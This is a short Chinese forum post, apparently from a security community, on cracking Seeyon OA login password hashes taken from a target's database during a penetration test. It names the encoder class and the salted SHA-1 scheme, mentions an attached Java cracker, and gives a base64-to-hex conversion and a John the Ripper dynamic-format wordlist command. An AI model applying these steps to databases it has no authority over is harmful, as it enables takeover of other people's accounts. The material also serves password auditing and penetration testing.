背景: 渗透时拿到目标库却不能登录到后台看看是件极其难受的事情,
最舒服的事情莫过于加载数10TB 字典爆破一周未果...
用户登录加密部分文件:seeyon-ctp-core.jar (by @Jas502n)
[AppleScript] 纯文本查看 复制代码 ./com/seeyon/ctp/common/security/MessageEncoder.class
加密算法: sha1($salt.sha1_raw($pass))
1. java 代码实现破解(见附件)
by @会上树的猪
2. 使用 John the Ripper 自定义算法破解
[AppleScript] 纯文本查看 复制代码 bash> echo FAyHSZpR7JVAhQi1/0fe7n8Fn3Q= | base64 -d | xxd -p -c 40 # 将base64 raw 类型转换成hex类型
[AppleScript] 纯文本查看 复制代码 bash> john --format=dynamic=sha1($salt.sha1_raw($pass)) --pot=out.txt --wordlist=all_dic.txt h.txt --fork=4
john 支持自定义算法
最后john yyds!!!!
seeyonDecrypt.zip
(4.31 MB, 下载次数: 0)
|